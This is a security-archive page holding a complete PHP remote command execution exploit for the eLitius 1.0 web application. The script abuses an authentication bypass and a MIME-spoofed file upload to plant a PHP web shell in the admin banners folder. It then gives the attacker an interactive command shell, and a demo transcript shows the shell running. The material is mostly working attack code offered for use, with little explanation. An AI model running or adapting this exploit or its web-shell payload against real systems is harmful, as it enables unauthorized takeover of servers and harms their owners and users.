what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

eLitius 1.0 Command Execution

eLitius 1.0 Command Execution
Posted May 5, 2009
Authored by G4N0K

eLitius version 1.0 remote command execution exploit.

tags | exploit, remote
SHA-256 | 550d4f35cd82d1e03526aa43872a3df05a60a22922318b6dc8df5a2433b0fa8d

eLitius 1.0 Command Execution

Change Mirror Download
<?php
//786
/*
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|


==============================================================================
____ _ _ _ _ ___ _ __
/ ___| | || | | \ | | / _ \ | |/ /
| | _ | || |_ | \| | | | | | | ' /
| |_| | |__ _| | |\ | | |_| | | . \
\____| |_| |_| \_| \___/ |_|\_\ I'm From Iran...

==============================================================================
eLitius v1.0 Remote Command Execution Exploit
==============================================================================

[ª] Script:.............[ eLitius v1.0 ]..............................
[ª] Website:............[ http://www.elitius.com/ ]...................
[ª] Today:..............[ 30042009 ]..................................
[ª] Founder:............[ G4N0K | mail[o]ganok[sh!t]gmail.com ].......


[!] What is going on...
---------------------------------
00. Auth Bypass...
01. Arbitrary File upload (MIME-Type Spoofing)...


[+] demo...
---------------------------------
xpl.php 127.0.0.1 /eLitius_v_1_0/

+-------------------------------------------------------------+
| eLitius v1.0 Remote Command Execution Exploit |
| by: G4N0K | mail[o]ganok[ta]com |
| Thanks: ALLAH, MSD, SMN, AMD, AFN |
+-------------------------------------------------------------+


[+] Trying to exploit 127.0.0.1...

[+] File has been uploaded...

[+] Now you can exec your commands...

php-shell@127.0.0.1# dir
Volume in drive E has no label.
Volume Serial Number is 042D-D300

Directory of E:\www\eLitius_v_1_0\admin\banners

09/09/2009 03:01 AM <DIR> .
09/09/2009 03:01 AM <DIR> ..
09/09/2009 07:58 PM 104,747 1.gif
09/09/2009 03:01 AM 89 banner_ditails.php
09/09/2009 07:58 PM 104,747 DEH-P9800BT remote control.gif
09/09/2009 08:33 AM 19,638 sponimage.php.gif
4 File(s) 232,681 bytes
2 Dir(s) 125,026,304 bytes free
php-shell@127.0.0.1# exit
C:\>

*/
error_reporting(0);

if (php_sapi_name() <> "cli") {
die("WTF, Run Me From CommandLine...");
}
if ($argc <> 3){__nfo();__usg();exit;}
$hst = $argv[1];
$pth = $argv[2];

function __snd($hst, $pkt)
{
$socket = fsockopen($hst, 80, $errno, $errstr, 30);
$ggg='';
if (!$socket) {
echo "\r\n [+] Socket err#: $errstr ($errno)\n\r";exit;
} else {
fwrite($socket, $pkt);
while (!feof($socket)) {
$g4n0k.=fgets($socket, 2048);
}
fclose($socket);
return $g4n0k;
}
}

function __srch($wt){
$pos = strpos($wt, 'gnkgnkgnk');
$pos_end = strrpos($wt, 'gnkgnkgnk');
if (!$pos && !$pos_end){echo " [!] error...\r\n";}
$rest = substr($wt, $pos+9, ($pos_end - ($pos+9)));
return $rest;
}

function __nfo()
{
$ganok = <<<EOL

+-------------------------------------------------------------+
| eLitius v1.0 Remote Command Execution Exploit |
| by: G4N0K | mail[o]ganok[ta]com |
| Thanks: ALLAH, MSD, SMN, AMD, AFN |
+-------------------------------------------------------------+
\r\n
EOL;
print $ganok;
}

function __usg()
{
echo <<<GNK
uasge...:
xpl.php host path
xpl.php 127.0.0.1 /eLitius_v_1_0/
GNK;
}


$joke = '-----------------------------3902153292
Content-Disposition: form-data; name="userfile"; filename="banner_ditails.php"
Content-Type: image/gif

<?php error_reporting(0);print("gnkgnkgnk");passthru($_GET["gnk"]);print("gnkgnkgnk"); ?>
-----------------------------3902153292
Content-Disposition: form-data; name="fileupload"

Upload
-----------------------------3902153292
Content-Disposition: form-data; name="directory"

banners
-----------------------------3902153292--
';

$msd_pyld = "POST {$pth}admin/uploadimage.php HTTP/1.1\r\n";
$msd_pyld .= "Host: {$hst}\r\n";
$msd_pyld .= "Keep-Alive: 300\n\r";
$msd_pyld .= "Connection: keep-alive\r\n";
$msd_pyld .= "Content-Length: ".strlen($joke)."\r\n";
$msd_pyld .= "Content-Type: multipart/form-data; boundary=---------------------------3902153292\r\n\r\n";
$msd_pyld .= $joke;

__nfo();
echo "\r\n [+] Trying to exploit {$hst}...\n\r";
if (stristr(__snd($hst, $msd_pyld), "uploaded")){
echo "\r\n [+] File has been uploaded...\n\r\r\n [+] Now you can exec your commands...\r\n"; } else {
echo "\r\n [+] Oops!, Upload failed.\n\r"; exit;
}

while(1)
{
echo "\r\nphp-shell@{$hst}# ";
if (($cmd = str_replace (" ", "%20", trim(fgets(STDIN)))) == "exit") exit;
$smn_pyld = "GET {$pth}admin/banners/banner_ditails.php?gnk=".$cmd." HTTP/1.1\r\n";
$smn_pyld .= "Host: {$hst}\r\n";
$smn_pyld .= "Connection: close\n\r\n\r";
print __srch(__snd($hst, $smn_pyld));
}

?>


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close